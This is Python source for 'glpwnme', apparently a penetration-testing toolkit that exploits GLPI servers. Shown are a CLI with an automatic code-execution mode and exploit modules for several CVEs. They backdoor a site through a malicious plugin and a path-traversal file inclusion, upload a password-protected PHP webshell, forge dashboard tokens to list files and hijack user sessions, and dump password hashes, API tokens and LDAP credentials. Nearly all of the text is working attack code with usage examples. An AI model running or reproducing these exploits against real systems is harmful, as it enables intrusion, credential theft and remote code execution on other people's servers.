        self.parser.add_argument("--infos", help="Display the informations about an exploit", action="store_true")
        self.parser.add_argument("-O", "--options", help="Options to add for the exploit", nargs="+")

        # Others
        self.parser.add_argument("--dump-cookies", help="Just login on the target and dump the cookies", action="store_true")
        self.parser.add_argument("--no-init", help="Do not init the session", action="store_true")
        self.parser.add_argument('--proxy', help='Full url for the proxy')
        self.parser.add_argument("-H", "--header", help="Header(s) to add", nargs="+")
        self.parser.add_argument("--list-plugins", help="Try to enum plugins on the target", action="store_true")
        self.parser.add_argument("--decrypt-old", help="Decrypt old password on GLPI version below or equal to 9.4.6")
        self.parser.add_argument("--debug", action="store_true", help="Debug requests made to the target")

        self.args = self.parser.parse_args()

    def __getattr__(self, name):
        return getattr(self.args, name, "")

def headers_to_dict(headers, separator=":"):
    """
    Parse the list of headers and return a
    dict containing the header ready to use
    Also used for the options

    .. code-block:: python

        >>> options = ["db=glpi_users", "columns=name,password"]
        >>> headers_to_dict(options, "=")
        {'db': 'glpi_users', 'columns': 'name,password'}
        >>>

    :param headers: The headers provided by the user
    :type headers: List[str]

    :return: The dict containing the header for python
    :rtype: Dict[str, str]
    """
    if not headers:
        return None

    headers_dict = {}
    for header in headers:
        key, val = header.split(separator, 1)
        headers_dict[key.strip()] = val.strip()
    return headers_dict

def run_cli():
    """
    Run glpwnme
    """
    glpwnme = GlpwnMe()
    glpwnme.parse()

    session = GlpiSession(target=glpwnme.target,
                          proxies=glpwnme.proxy,
                          headers=headers_to_dict(glpwnme.header),
                          credentials=GlpiCredentials(glpwnme.username,
                                                      glpwnme.password,
                                                      glpwnme.otp,
                                                      glpwnme.auth,
                                                      glpwnme.token,
                                                      glpwnme.cookie,
                                                      glpwnme.profile,
                                                      glpwnme.server_user,
                                                      glpwnme.server_password),
                          debug_request=glpwnme.debug)

    init_exploits = list(map(lambda exploit: exploit(session), get_all_exploits()))
    exploit_options = headers_to_dict(glpwnme.options, separator="=")
    orchestrator = ExploitOrchestrator(init_exploits)

    if(glpwnme.exploit and glpwnme.infos):
        orchestrator.show_infos_about(glpwnme.exploit)

    elif glpwnme.decrypt_old:
        Log.print(f"Trying to decrypt password: [b blue]{glpwnme.decrypt_old}[/b blue]")
        res = GlpiUtils.decrypt_old(glpwnme.decrypt_old)
        try:
            print(res.decode())
        except:
            print(res)

    elif glpwnme.list_plugins:
        from glpwnme.exploits.plugins_enum import PluginEnums
        plugin_enumerator = PluginEnums(session)
        plugin_enumerator.run()
        plugin_enumerator.show_plugins_found()

    elif(glpwnme.check_all or glpwnme.exploit or glpwnme.dump_cookies):
        try:
            ### TODO, login before initializing the session if credentials are provided
            if not glpwnme.no_init:
                session.init_session()
                if(session.glpi_infos.session_dir_listing
                    and session.glpi_infos.glpi_version
                    and version.parse(session.glpi_infos.glpi_version) < version.parse("10.0.18")):
                    go_on = Log.ask("Do you want [b]glpwnme[/] to achieve"
                                    " [red]code execution[/red] automatically ?")

                    if go_on:
                        from glpwnme.input_reader import GlpwnmeAnime
                        KiddieLogger.display(f"[+] Script kiddie mode enabled...", "\x1b[32m")
                        KiddieLogger.display(f"[+] Searching cookie...", "\x1b[32m")
                        sess = session.find_admin_user_from_dir_listing()
                        if sess:
                            session.skip_check = True
                            KiddieLogger.display(f"[+] Admin cookie: {sess}", "\x1b[32m")
                            KiddieLogger.display(f"[+] Starting hacking...", "\x1b[31m")
                            GlpwnmeAnime.start()
                            try:
                                orchestrator.run_exploit("PHP_UPLOAD", {"quiet": False})
                            except Exception as e:
                                KiddieLogger.display(f"[+] Webshell crashed before landing...", "\x1b[31m")
                                Log.err(e)
                        else:
                            KiddieLogger.display(f"[-] No administrator session found...", "\x1b[31m")
                        exit(0)

        except requests.exceptions.ConnectionError as e:
            Log.err("It seems that the target is unavailable,"
                    " [b]Check your internet connections !!![/b]")
            Log.err(e)
            exit(1)

        except BadCredentialsException as e:
            Log.err(e)
            exit(2)

        if glpwnme.dump_cookies:
            if session.login_with_credentials():
                Log.msg(*session.get_login_cookie(), sep="; ") # Trickshot from Romain Michel
            else:
                Log.err("Login failed")

        elif glpwnme.check_all:
            Log.log("Checking all exploits...")
            potential_exploits = orchestrator.get_checked_exploits(glpwnme.no_opsec)
            if potential_exploits:
                Log.msg("Exploits working on target:")
                ExploitOrchestrator.display_exploits(potential_exploits)
            else:
                Log.err("No exploit compatible found")

        elif glpwnme.exploit:
            if glpwnme.run:
                try:
                    orchestrator.run_exploit(glpwnme.exploit, exploit_options)
                except Exception as e:
                    Log.err(e)

            elif glpwnme.check:
                orchestrator.check_exploit(glpwnme.exploit, glpwnme.no_opsec)

            elif glpwnme.clean:
                try:
                    orchestrator.clean_exploit(glpwnme.exploit, exploit_options)
                except Exception as e:
                    Log.err(e)

            else:
                Log.err("Please specify an action with the exploit: --check, --run, --clean or --infos")

    else:
        header()
        ExploitOrchestrator.display_exploits(orchestrator.exploits)
        Log.print(f"There are currently [i b]{len(orchestrator.exploits)}[/] [u]exploits[/] available")
        Log.log("Choose among the actions:")
        Log.log("(--check-all or --exploit <exploit name>), --check, --run, --clean, --infos")



from enum import Enum

class Privs(Enum):
    """
    Class containing the privilege available in glpi
    There are 7 different privs in GLPI (User = Self-Service)

    In glpi:

        mysql> select id, name from glpi_profiles order by id;
        +----+--------------+
        | id | name         |
        +----+--------------+
        |  1 | Self-Service |
        |  2 | Observer     |
        |  3 | Admin        |
        |  4 | Super-Admin  |
        |  5 | Hotliner     |
        |  6 | Technician   |
        |  7 | Supervisor   |
        |  8 | Read-Only    |
        +----+--------------+

        mysql> select * from glpi_profilerights where name="typedoc"
        +-----+-------------+---------+--------+
        | id  | profiles_id | name    | rights |
        +-----+-------------+---------+--------+
        |  21 |           1 | typedoc |      0 |
        |  89 |           2 | typedoc |      1 | # 1 --> READ right
        | 162 |           3 | typedoc |     23 | # 23 --> ALL rights
        | 234 |           4 | typedoc |     23 |
        | 307 |           5 | typedoc |      0 |
        | 378 |           6 | typedoc |      0 |
        | 449 |           7 | typedoc |      0 |
        | 568 |           8 | typedoc |      1 |
        +-----+-------------+---------+--------+
    """
    Unauthenticated = 0
    User = 1
    Observer = 2
    Admin = 3
    Superadmin = 4
    Hotliner = 5
    Technician = 6
    Supervisor = 7
    Readonly = 8

    @classmethod
    def list(cls):
        """
        List the different privileges available
        
        :return: The list of the different available privileges
        :rtype: list
        """
        privs = []
        for priv in cls.__members__:
            privs.append(priv)

        return privs



import re
import time
from http import HTTPStatus
from ..exploit import GlpiExploit
from ..privileges import Privs
from glpwnme.exploits.logger import Log
from bs4 import BeautifulSoup
from glpwnme.exploits.utils import GlpiUtils

class CVE_2024_37149(GlpiExploit):
    """
    This CVE abuses the plugin feature to create a backdoor on the application
    on an existing plugin

    The exploit will not work for GLPI below 10.0.0, because a uniqid is added to the name
    of the uploaded file. Killing the last step of the lfi.

    @author RIOUX Guilhem
    @cvss 5.6
    @name CVE_2024_37149
    """
    min_version = "10.0.0"
    max_version = "10.0.16"
    _impacts = "RCE (through LFI and other tricks)"
    _privilege = "Super-Admin"

    @staticmethod
    def _make_payload(id, column, val):
        """
        Create the payload to update a Plugin column on glpi
        """
        return {"action": "update",
                "items_id": id,
                "itemtype": "Plugin",
                "column_field": column,
                "column_value": val}

    def infos(self):
        """
        This method is used to display the information of an exploit.
        This method support rich formatting

        :return: The whole informations about an exploit
        :rtype: str
        """
        infos = "[u]Description:[/u]\n"
        infos += "This exploit is [b]Beautiful[/], you are soooo [u]lucky[/] :four_leaf_clover: to use it.\n"
        infos += "..rephrasing.\n"
        infos += "This [b]Reallyyyyyyy beautiful[/] exploit, will set up an LFI on the target.\n"
        infos += "I mean a [b]Beautiful LFI[/] (one of my favorite vulnerability after deserialisation).\n"
        infos += "I hope you find [b]LFI awesome[/] too !\n"
        infos += "Anyway, how does it works and why its dangerous (and [b]Beautiful[/b]) ?\n"
        infos += "\n====================================================================================================\n"
        infos += ":warning-emoji:  Exploit will change the permission of the Super-Admin role to create an arbitrary plugin\n"
        infos += ":warning-emoji:  Then, it will upload a file named setup.php on the global upload dir\n"
        infos += ":warning-emoji:  Finally, it will setup the LFI to this file previously uploaded\n"
        infos += "====================================================================================================\n"
        infos += "Check that the profile SuperAdmin is equal to 4 on the target !\n"

        infos += "\n[u]Did I used it already in assessment ?[/]\n"
        infos += "[b]Yeeeeeeeaaah, worked prefectly[/], still you should move your shell to front or ajax once done !\n"

        infos += "\n[u]Usage:[/u]\n"
        infos += "[grey66]# Run :smile:[/]\n"
        infos += "--run\n"
        infos += "\n[grey66]# Clean the plugin_id 3[/]\n"
        infos += "[grey66]# I advise you to remove the plugin from the web interface[/]\n"
        infos += "--clean -O plugin_id=3\n"
        infos += "\nExploit is [red b]Dangerous[/] (but use it !)"
        return infos

    def _add_config_right(self, right="31"):
        """
        Exploit mass assignment from super admin to add Config create right

        Right on glpi:
         - READ: 1
         - UPDATE: 2
         - CREATE: 4
         - DELETE: 8
         - PURGE: 16
         - ALLSTANDARDRIGHT: 31

        :param right: The right to set for the config (by default it is 3 on glpi)
        :type right: str

        :return: Whether or not the operation succeeded
        :rtype: bool
        """
        res = self.post("/front/profile.form.php", data={"update":"1", f"_config[{right}_0]":"1", "id": Privs["Superadmin"].value}, allow_redirects=False)
        if res.status_code == HTTPStatus.FOUND:
            Log.msg(f"[b]Config rights[/b] shall have been updated to [yellow]{right}[yellow]")
            return True
        Log.err("You do not have the rights to update profiles")
        return False

    def _safe_directory(self, directory):
        """
        Convert a directory to a safe one. On Windows systems, the plugins
        directory would be like so: ../../../../..C:\\Site\\glpi/files which fails.
        It shall be something like: ../../../../../\\\\.\\C:\\Site/glpi/files (It fails so I use only '/')
        For now it is: ../../../../../Site/glpi/files

        :param directory: The directory to check
        :type directory: str

        :return: The new directory
        :rtype: str
        """
        win_index = directory.find(":\\")
        if win_index != -1:
            Log.msg("Directory is a [red]Windows path[/red], converting it..")

            #################################################
            # Directory is "../../../../../..C:\\test\\files"
            # Become "../../../../../..C"
            # Become "../../../../../.."
            #################################################
            new_dir = directory[:win_index]
            last_dot = new_dir.rfind(".")
            new_dir = new_dir[:last_dot + 1].rstrip("/")

            # new_dir += "/\\\\.\\" + directory[last_dot + 1:]

            #################################################
            # Directory is "../../../../../..C:\\test\\files"
            # Become "test\\files"
            # Become "test/files"
            #################################################
            end_path = directory[win_index + len(":\\"):].lstrip("\\")
            end_path = end_path.replace("\\", "/")

            #################################################
            # Directory is "../../../../../..C:\\test\\files"
            # Become "../../../../../../test/files"
            #################################################
            new_dir += "/" + end_path
            Log.log(f"New directory: [blue]{new_dir}[/blue]")
            return new_dir
        return directory.replace("//", "/")

    def _add_plugin_object(self, directory, state="0"):
        """
        Add a new plugin from nothing

        :param directory: The directory of the plugin, where the file will be included
        :type directory: str

        :param state: The state of the plugin. If set to "1", the plugin will be accessible even
          from unauth user
        :type state: Union["0", "1"]

        :return: Whether or not the plugin has been created successfully
        :rtype: bool
        """
        directory = self._safe_directory(directory)
        plugin_name = "jrjgjk"
        plugin_add = {"itemtype": "Plugin",
                      "action": "add_item",
                      "inputs": f"name={plugin_name}&version=1.0&author=Guilhem&license=GPL&directory={directory}"}

        if state == "1":
            plugin_add["inputs"] += f"&state=1"

        Log.log(f"Adding [b]malicious[/b] plugin [b bright_yellow]{plugin_name}[/b bright_yellow]")
        res = self.post("/ajax/kanban.php", data=plugin_add)
        if res.status_code == HTTPStatus.FORBIDDEN:
            Log.err("You do not have the right to CREATE config")
            return False

        elif res.status_code == HTTPStatus.BAD_REQUEST:
            Log.err("An unknown error occured while creating plugin")
            return False

        Log.msg(f"Plugin [b]{plugin_name}[/b] created !")
        self._write_log(f"Created plugin: {plugin_name}")

        ######################################################################
        # Here we try to recover the id of the plugin created recently in case
        # a problem occured, so you can remove it afterwards
        # with the `clean` param
        ######################################################################
        search_plugin = {
            "action": "display_results",
            "itemtype": "Plugin",
            "criteria[0][link]": "AND",
            "criteria[0][field]": "view",
            "criteria[0][searchtype]": "contains",
            "criteria[0][value]": plugin_name,
            }
        res = self.post("/ajax/search.php", data=search_plugin)
        id_regex = re.compile(r"/front/plugin\.form\.php',\s?{'action':\s?'clean',\s?'id':\s?'(\d+?)'")
        found = re.findall(id_regex, res.text)
        if found:
            plugin_id = found[0]
            self._write_log(f"Plugin created with id: [{plugin_id}]")
            Log.msg(f"Plugin id: [b]{plugin_id}[/b]")
        return True

    def _add_new_documenttype(self, name="Exploit", extension="php", mime="application/x-php"):
        """
        Add a new document type into glpi

        :return: Whether or not the documenttype exists
        :rtype: bool
        """
        data = {"name": name,
                "entities_id": "0",
                "comment": "",
                "icon": "",
                "ext": extension,
                "mime": mime,
                "add": "1"}
        res = self.post("/front/documenttype.form.php", data=data, allow_redirects=False)
        if GlpiUtils.is_access_denied(res.content):
            Log.err("Not enough privilege for exploit")
            return False
        self._write_log(f"PHP Extension added, remove it here {self.glpi_session.target}/front/documenttype.php")
        return True

    def run(self):
        """
        Run the exploit on the target, to backdoor an account
        This exploit will first modify the config right of the Super-Admin profile.
        Then it will upload a 'setup.php' that is classic for GLPI Plugins
        Also, it will create a Plugin entry in the GLPI DB to allow RCE.
        Finally the malicious plugin will be loaded each time the page plugin.php or
          marketplace.php will be accessed
        At the end, the right of the config will be reset for the profile Super-Admin
        """
        Log.log("Do not forget to clean your exploit, click on the broom :broom:")

        # Set english session, used for parsing error message
        self.post("/front/user.form.php", data={"language":"en_GB"})
        glpi_tmp_dir = self.glpi_session.extract_glpi_var("GLPI_TMP_DIR")
        if not glpi_tmp_dir:
            Log.err("Are you sure you are admin, cannot find [b blue]GLPI_TMP_DIR[/b blue] constant value")
            return None

        glpi_tmp_dir = glpi_tmp_dir.strip()
        Log.msg(f"Found glpi_tmp_dir: {glpi_tmp_dir}")
        Log.log(f"Uploading backdoor..")

        # Deleting already uploaded setup.php file
        self.glpi_session.delete_file("setup.php")

        result = self.glpi_session.upload_file("setup.php", GlpiUtils.get_glpi_shell())
        if "error" in result.keys():
            error_msg = result["error"]
            Log.err(f"Got error: {error_msg}")
            if error_msg == "Filetype not allowed":
                Log.log("Adding php extension on the target")
                if not(self._add_new_documenttype("Orange Cyberdefense")):
                    return None

            else:
                Log.err("Unknown error, Aborting exploit...")
                return None

            result = self.glpi_session.upload_file("setup.php", GlpiUtils.get_glpi_shell())
            if "error" in result.keys():
                error_msg = result["error"]
                Log.err(f"Got error: {error_msg}")
                Log.err(f"Cannot upload file, please add the 'php' extension on the target")
                Log.err(f"Here: [link={self.glpi_session.target}/front/documenttype.form.php]documenttype.form.php[/link]")
                return None

        file_url = self.glpi_session.r("/files/_tmp/" + result["name"])

        if result["name"] != "setup.php":
            Log.err(f"File uploaded with the wrong name: {result['name']}")
            Log.err(f"Aborting exploit")
            self.glpi_session.delete_file(result['name'])
            return None

        Log.msg(f"Files uploaded {file_url} !")
        Log.log(f"Setting up LFI...")

        if not self._add_config_right():
            Log.err(f"Aborting exploit..")
            return None

        if not self._add_plugin_object(directory=f"../../../../../../../../../../../../../../../..{glpi_tmp_dir}"):
            self._add_config_right(right="3")
            return None

        Log.log(f"{self.glpi_session.target}/front/plugin.php?passwd=P@ssw0rd123&_hidden_cmd=#<whoami|optionnal>")
        self._add_config_right(right="3")

    def clean(self, plugin_id):
        """
        Function to clean the traces of the previous exploit

        :param plugin_id: The id of the plugin that has been tampered
        :type plugin_id: str
        """
        if not plugin_id.isdigit():
            raise ValueError("plugin_id must be digits only")

        delete_data = {"action": "clean", "id": plugin_id}
        res = self.post("/front/plugin.form.php", data=delete_data, allow_redirects=False)
        if not GlpiUtils.is_access_denied(res.text):
            if not self.glpi_session.delete_file("setup.php"):
                Log.log("No setup file removed")
            Log.msg("Backdoor must have been removed")
            self._write_log(f"Backdoor has been removed, by cleaning the plugin with id [{plugin_id}]")
        else:
            Log.err("Not enough privilege, please use another user")



import time
from http import HTTPStatus
from ..exploit import GlpiExploit
from glpwnme.exploits.logger import Log
from bs4 import BeautifulSoup
from glpwnme.exploits.utils import GlpiUtils

class PHP_UPLOAD(GlpiExploit):
    """
    This class upload a php file on the target
    after the version 10.0.10, you will not be able to access your php file directly.

    @author glpi
    @cvss 5.0
    @name PHP_UPLOAD
    """
    _impacts = "Upload a php file and returns its location"
    _privilege = "Admin"
    max_version = "10.0.18"

    def infos(self):
        """
        This method is used to display the information of an exploit.
        This method support rich formatting

        :return: The whole informations about an exploit
        :rtype: str
        """
        infos = "[u]Description:[/u]\n"
        infos += "This exploit is will upload a .php file and keep its original name.\n"
        infos += "If the extension php is not authorized, it will automatically add it on the target\n"

        infos += "\n[u]Params:[/u]\n"
        infos += " - [i]file (default is the glpi webshell shell.php)[/i]: The php file to upload on the target\n"

        infos += "\n[u]Usage:[/u]\n"
        infos += "[grey66]# Upload a the glpi default web shell on the target[/]\n"
        infos += "--run\n"
        infos += "\n[grey66]# Upload one of your file named test.php[/]\n"
        infos += "--run -O file='test.php'\n"
        infos += "\nIn order to clean, remove the extension you have added in '/front/documenttype.php'\n"
        infos += "\nExploit is [green b]Safe[/]"
        return infos

    def _add_new_documenttype(self, name="Exploit", extension="php", mime="application/x-php"):
        """
        Add a new document type into glpi

        :return: Whether or not the documenttype exists
        :rtype: bool
        """
        data = {"name": name,
                "entities_id": "0",
                "comment": "",
                "icon": "",
                "ext": extension,
                "mime": mime,
                "add": "1"}
        res = self.post("/front/documenttype.form.php", data=data, allow_redirects=False)
        if GlpiUtils.is_access_denied(res.content):
            Log.err("Not enough privilege for exploit")
            return False
        self._write_log(f"Extension '.php' was added, please reset it here: {self.glpi_session.target}/front/documenttype.form.php")
        return True

    def run(self, file=None, quiet=False):
        """
        Run the exploit on the target

        :param file: The file to upload if any
        :type file: os.PathLike
        """
        Log.quiet = quiet
        self.post("/front/user.form.php", data={"language":"en_GB"})

        filename = "orange.php"
        file_content = GlpiUtils.get_glpi_shell()
        if file:
            with open(file, "rb") as webshell:
                filename = file
                file_content = webshell.read()

        result = self.glpi_session.upload_file(filename, file_content)
        if "error" in result.keys():
            if "Filetype not allowed" not in result.get("error"):
                # Unknown error
                return None

            # Cannot upload shell because of file extension ?
            if not self._add_new_documenttype(name="orangecyberdefense"):
                return None

            result = self.glpi_session.upload_file(filename, file_content)
            if "error" in result.keys():
                Log.err("Got error: " + result['error'])
                return None

        file_url = self.glpi_session.r("/files/_tmp/" + result["name"])

        if not file:
            full_url = f"{file_url}?passwd=P@ssw0rd123&_hidden_cmd=#<whoami|optionnal>"
            if quiet:
                Log.quiet = False
                Log.print(f"[red][+] Webshell successfully landed: {full_url}[/]")
            else:
                Log.msg(f"Access your file: {full_url}")

        else:
            Log.msg(f"Your file is here: {file_url}")

        if self.get(file_url, allow_redirects=False).status_code != HTTPStatus.OK:
            Log.print(":warning-emoji:  If you cannot access your file, this is because you must "
                      "[b]delete[/b] the file `/files/.htaccess` with another [b yellow]Exploit[/b yellow]")



import re
import json
import readline
from urllib.parse import urlparse
from http import HTTPStatus
from ..exploit import GlpiExploit
from glpwnme.exploits.logger import Log
from bs4 import BeautifulSoup
from glpwnme.exploits.utils import GlpiUtils
from requests.utils import requote_uri

class CVE_2024_50339(GlpiExploit):
    """
    This CVE abuses a permissive access to a file. Then by recovering the instance_uuid of glpi it is possible to
    craft special token that give access to the dashboard. Once the dashboard access, you can access the
    search engine of GLPI that will help you list users, configs params, ...
    But also, given the scss compiler used by GLPI you can list files on the server.
    It allows you to recover the sessions files of any authenticated user on the server !!!

    @author RIOUX Guilhem
    @cvss 9.3
    @name Leakymetry
    """
    RE_JSON = re.compile(r'\{.*\}', re.DOTALL)
    RE_SESSION = re.compile(r'.*/sess_([a-zA-Z0-9]+)$')
    min_version = "9.5.0"
    max_version = "10.0.17"
    _impacts = "Authentication bypass through session hijacking"
    _privilege = "Unauthenticated"

    def _enum_item(self, instance_uuid, itemtype, fields=[1]):
        """
        Enum some fields of an item
        """
        data = '{"is_recursive":1,"entities_id":0,"dashboard":"central"}'
        token = GlpiUtils.calc_uuid("central", instance_uuid)

        url_format = '/ajax/dashboard.php?embed=1&token={token}&action=get_card&card_id=bn_count_User&'
        url_format += 'args[widgettype]=searchShowList&args[apply_filters][id]=2&data={data}&args[color]=ffffff&'
        url_format += 'args[itemtype]={itemtype}&args[limit]=2000'

        for field in fields:
            url_format += f'&args[s_criteria][][field]={field}'

        return requote_uri(self.glpi_session.r(url_format.format(token=token, data=data, itemtype=itemtype)))

    def infos(self):
        """
        Return the information about the exploit
        """
        infos = "[u]Description:[/u]\n"
        infos += "This exploit allows you to recover the telemetry of GLPI\n"
        infos += "It Contains the whole informations about the target architecture / versions.\n"
        infos += "From this, you will be able to list files on vulnerable instances.\n\n"

        infos += "[u]Usage:[/u]\n"
        infos += "Add [i]-O show_all=1[/i] to display urls accessible for enumeration\n"
        infos += "Add [i]-O token=<token>[/i] token to use if already recovered\n\n"

        infos += "[u]Note:[/u]\n"
        infos += "Please note that this exploit make a request to the update DB\n"
        infos += ":warning-emoji:  Leakymetry will [b]disable all plugins[/b] in use\n\n"

        infos += "Exploit is [b red]Dangerous[/b red]"
        return infos

    def _hook_sessions(self, sessions):
        """
        Hook sessions recovered to check their privileges
        """
        cookies = self.glpi_session.get_login_cookie()
        if not cookies:
            return

        cookie_name = cookies[0].split("=")[0]

        copied_sessions = sessions.copy()
        for i, session in enumerate(copied_sessions):
            if re.match(self.__class__.RE_SESSION, session):
                cookie = re.findall(self.__class__.RE_SESSION, session)[0]

                self.glpi_session.set_login_cookie(f"{cookie_name}={cookie}")
                res = self.get("/index.php")
                profiles = GlpiUtils.extract_user_profiles(res.text)
                if profiles:
                    Log.print(f"{session} --> [green]{', '.join(profiles)}[/green]")
                elif urlparse(res.url).path.split("/").pop() != 'index.php':
                    # Old glpi versions, lets enumerate
                    url_path = urlparse(res.url).path.split("/").pop()
                    if url_path == "central.php":
                        Log.print(f"{session} --> [gold3]High privileges[/gold3]")

                    else:
                        Log.print(f"{session} --> [gold3]Low privileges[/gold3]")

                else:
                    Log.print(f"{session} --> [red]Disconnected[/red]")
                sessions.remove(session)

    def start_leak(self, instance_uuid):
        """
        Pseudo shell to list files on directory
        """
        PLACEHOLDER = "INSERT_GLOB_DIR"
        token = GlpiUtils.calc_uuid("central", instance_uuid)

        url_format = f'/ajax/dashboard.php?embed=1&token={token}'
        url_format += '&data={"is_recursive":1,"entities_id":0,"dashboard":"central"}&action=get_card&card_id=bn_count_User'
        url_format += '&args[itemtype]=User&args[widgettype]=pie&args[rand]=DOM_NAME{color:%20(scssphp-glob('
        url_format += PLACEHOLDER
        url_format += '));}%0D%0A.dashboard-456&args[use_gradient]=1'

        print()
        Log.msg(f"Starting interactive [gold3]ls[/gold3]")
        Log.msg(f"The default sessions shall be here [gold3]../files/_sessions/sess_*[/gold3]\n")
        while True:
            dir_to_leak = input("Enter dirname (exit) >>> ")
            dir_to_leak = dir_to_leak.strip()

            if dir_to_leak.startswith("ls "):
                dir_to_leak = dir_to_leak[3:]

            if not dir_to_leak:
                continue

            elif dir_to_leak in ["x", "exit", "quit"]:
                break

            elif '*' not in dir_to_leak:
                Log.err("The '*' char was not present in your input, globbing might fail")

            random_dom_name = GlpiUtils.random_str(10)
            RE_DASHBOARD_RESULT = re.compile(rf'.dashboard #chart-{random_dom_name}\s*{{\s*color:(.*?)}}', re.DOTALL)

            payload_url = url_format.replace(PLACEHOLDER, dir_to_leak).replace("DOM_NAME", random_dom_name)
            res = self.get(payload_url)
            result = re.findall(RE_DASHBOARD_RESULT, res.text)
            try:
                if result:
                    result = result[0].strip().split(',')
                    beautified_res = list(map(lambda fname: fname.strip('";\r\n '), result))
                    try:
                        self._hook_sessions(beautified_res)

                    except KeyboardInterrupt:
                        pass

                    if beautified_res:
                        print(*beautified_res, sep="\n")

            except Exception as e:
                Log.err(e)
                print(res.text)

    def run(self, show_all=None, token=None):
        """
        Run the exploit on the target
        """
        if token:
            Log.msg(f"Using given token: {token}")
            self.start_leak(token)
            return

        res = self.post("/install/update.php", data={"continuer": "true"})
        if res.status_code != HTTPStatus.OK:
            Log.err(f"It seems the page is unavailable, got HTTP {res.status_code}")
            return None

        telemetry = self.get("/ajax/telemetry.php")
        try:
            json_telemetry = re.findall(self.__class__.RE_JSON, telemetry.text)[0]
            Log.msg(f"Telemetry for [green b]glpi[/green b] found:")
            Log.print(json_telemetry)

            uuid_loaded = json.loads(json_telemetry)["glpi"]["uuid"]
            if not uuid_loaded.replace('*', ''):
                Log.log(f'Target is patched')
                Log.log(f"Cookie used:")
                Log.log(*self.glpi_session.get_login_cookie(), sep="; ")
                return None
            print()

            if show_all:
                Log.msg(f"Dashboards urls:")
                central_url = GlpiUtils.get_dashboard_url("central", uuid_loaded)
                self.get(central_url)

                print(central_url)
                print(self.glpi_session.r(GlpiUtils.get_dashboard_url("assets", uuid_loaded)))
                print(self.glpi_session.r(GlpiUtils.get_dashboard_url("assistance", uuid_loaded)))
                print(self.glpi_session.r(GlpiUtils.get_dashboard_url("mini_tickets", uuid_loaded)))

                print()
                Log.msg(f"Leak sensitives datas:")
                Log.log(f"Use the following cookie:")
                Log.log(*self.glpi_session.get_login_cookie(), sep="; ")

                print()
                user_enum_http = self._enum_item(uuid_loaded, itemtype='User', fields=[5, 8, 15, 30, 16, 20, 21])
                Log.print(f"[u]Enum [b]users[/b] below:[/u]")
                print(user_enum_http)
                print()

                config_enum_http = self._enum_item(uuid_loaded, itemtype='Config')
                Log.print(f"[u]Enum [b]configuration[/b] below:[/u]")
                print(config_enum_http)

                print()
                apiclient_http = self._enum_item(uuid_loaded, itemtype='APIClient', fields=[1, 3, 5, 6, 8])
                Log.print(f"[u]Enum [b]Api Configuration[/b] below:[/u]")
                print(apiclient_http)

            self.start_leak(uuid_loaded)

        except Exception as e:
            Log.err(e)



import re
import time
from http import HTTPStatus
from packaging import version
from ..exploit import GlpiExploit
from glpwnme.exploits.logger import Log
from bs4 import BeautifulSoup
from glpwnme.exploits.utils import GlpiUtils

class CVE_2024_27937(GlpiExploit):
    """
    This CVE abuse a permissive fields exposure on the dropdown components, so sad that it requires authentication

    @author BOREL Enzo
    @cvss 6.4
    @name CVE_2024_27937
    """
    min_version = "0.85"
    max_version = "10.0.13"
    _impacts = "Object disclosure, Recover sensitive infos from the glpi database."
    _privilege = "User"
    _is_check_opsec_safe = True

    js_regex = {"idor_token": re.compile(r"_idor_token:\s*(\")?([A-Za-z0-9]+)(\1)?\s*,"),
                "right": re.compile(r"right:\s*(\")?(\w+)(\1)?\s*,"),
                "entity": re.compile(r"entity_restrict:\s*(\")?([^\"\s]+)(\1)?\s*,")
                }

    def infos(self):
        """
        This method is used to display the information of an exploit.
        This method support rich formatting

        :return: The whole informations about an exploit
        :rtype: str
        """
        infos = "[u]Description:[/u]\n"
        infos += "This exploit allows any authenticated user to list database fields of any other user.\n"
        infos += "This exploit [b green]is awesome[/], cause it really is safe and kind of show sensitive infos (such as password).\n"
        infos += "\n[b red u]Important:[/]\nOn GLPI < 9.5.0, encrypted password can be decrypted, see [i u]GlpiUtils::decrypt_old[/] method\n"

        infos += "\n[u]Params:[/u]\n"
        infos += " - [i]itemtype (default 'User')[/i]: The itemtype to recover content from the database (child of CommonDBTM)\n"
        infos += " - [i]fields (default: 'id,password,api_token,password_forget_token')[/i]:\n\tThe list of fields name (taken from the database) tor ecover (comma separated)\n"
        infos += " - [i]page_limit (default 2000)[/i]: The maximum number of result to recover from the database\n"
        infos += " - [i]page (optionnal)[/i]:\n\tThe page number to show, equivalent to SQL -> LIMIT page_limit OFFSET (page - 1)*page_limit\n"

        infos += "\n[u]Usage:[/u]\n"
        infos += "[grey66]# Recover the fields 'password, api_token' of the 200 first User in the db[/]\n"
        infos += "--run -O fields='password, api_token' page_limit=200\n"

        infos += "\n[grey66]# Dump the config stored in the database[/]\n"
        infos += "--run -O itemtype='Config' fields='value'\n"

        infos += "\n[grey66]# Recover the plugins installed on the target[/]\n"
        infos += "--run -O itemtype='Plugin' fields='directory,version'\n"

        infos += "\n[grey66]# Recover the ldap connections informations[/]\n"
        infos += "--run -O itemtype='AuthLDAP' fields='rootdn_passwd,host,basedn,rootdn,is_active'\n"

        infos += "\n[grey66]# Recover the mail connections informations[/]\n"
        infos += "--run -O itemtype='AuthMail' fields='name, connect_string, host'\n"

        infos += "\n[grey66]# Recover the logs from the database[/]\n"
        infos += "--run -O itemtype='Log' fields='old_value, new_value'\n"

        infos += "\n[grey66]# Recover the events from the database[/]\n"
        infos += "--run -O itemtype='Glpi\\Event' fields='id,message'\n"

        infos += "\n[grey66]# Recover the Tickets Answers from the database[/]\n"
        infos += "--run -O itemtype='ITILFollowup' fields='users_id,content'\n"
        
        infos += "\n[grey66]# Recover the Tickets Solutions from the database from number 2000 to 4000 (page 2)[/]\n"
        infos += "--run -O itemtype='ITILSolution' fields='users_id,content' page=2\n"
        infos += "--run -O itemtype='TicketTask' fields='uuid,content'\n"

        infos += "\n[grey66]# Recover the Users by profile and entities[/]\n"
        infos += "--run -O itemtype='Profile_User' fields='users_id,profiles_id,entities_id'\n"

        infos += "\n[u]Output example:[/u]\n"
        infos += "[grey66]============\nglpi;$2y$10$rXXzbc2ShaiCldwkw4AZL.n.9QSH7c0c9XJAyyjrbL9BwmWditAYm\n"
        infos += "glpi-system\nnormal;$2y$10$Z6doq4zVHkSPZFbPeXTCluN1Q/r0ryZ3ZsSJncJqkN3.8cRiN0NV.[/]\n"
        infos += "\nExploit is [green b]Super Safe[/]"
        return infos

    def _extract(self, name, html):
        """
        Extract a regex from html
        """
        val = re.findall(self.js_regex[name], html)
        if val:
            all_match = val[0]
            if len(all_match) == 3:
                result = all_match[1]
                if result == "null":
                    return ""
                return result
        Log.log(f"Cannot find property {name}")
        return None

    def _get_necessary_values(self, html):
        """
